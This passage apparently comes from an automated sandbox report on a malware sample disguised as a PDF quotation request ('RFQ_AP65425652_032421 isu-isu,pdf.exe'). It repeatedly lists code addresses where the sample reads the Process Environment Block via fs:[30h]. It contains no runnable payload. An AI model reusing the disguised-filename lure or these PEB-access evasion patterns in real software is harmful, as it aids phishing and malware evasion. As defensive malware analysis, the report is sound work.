          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
